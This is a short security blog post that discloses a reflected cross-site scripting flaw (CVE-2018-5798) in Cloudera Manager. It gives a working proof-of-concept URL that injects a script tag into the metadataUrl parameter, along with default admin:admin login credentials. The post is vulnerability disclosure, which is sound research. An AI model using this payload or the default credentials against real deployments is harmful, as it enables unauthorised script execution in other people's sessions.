Mar 23 2025

CVE-2018-5798 – Cross-site scripting vulnerability in Cloudera Manager – Part 2

Author: Shafeeque Olassery Kunnikkal | Category: Cross Site Scripting, CVE-2018-5798, Cyber Security | Leave a Comment

Below is the details of the reflected XSS , I have found in Cloudera Enterprise. More details can be found here :-  https://www.cloudera.com/documentation/other/securitybulletins/topics/Security-Bulletin.html#DOCS-3186

Login to Cloudera manager using credentials
admin:admin

1. Navigate the following URL which includes the XSS Payload.

xss

2. Navigate the following URL in browser after login to Cloudera Manager, use these credentials for login:- admin:admin

http://localhost:7180/cmf/config2/dialog?metadataUrl=%2fcmf%2fclusters%2f1%2fsearchConfig%2fmetadata.json%3fserviceDep%3dtrue%26q%3dspark_on_yarn%3C%2fscript%3E%3Cscript%3Ealert%28%27reflected%20xss%27%29%3C%2fscript%3E

Will see the XSS payload executed as shown in the image below.

XSS

Related Posts

Leave a Reply

Your email address will not be published. Required fields are marked *

Categories

Tags

CVE-2018-1528 Computer Forensics Black Box Penetration Testing complete-knowledge testing White Box Penetration Testing Information Security Cyber Security Degree Grey Box Penetration Testing Reflected XSS Penetration Testing Computer Forensics Degree E-Books CubicSDR Social Engineering partial-knowledge testing SDR Vulnerability Assessment Career Cyber Security XSS Education Cloudera Enterprise Cloudera Manager Career Options Phishing CVE-2018-5798 Email Fraud zero-knowledge testing Clickjacking Ethical Hacking IBM Maximo Asset Management

Archives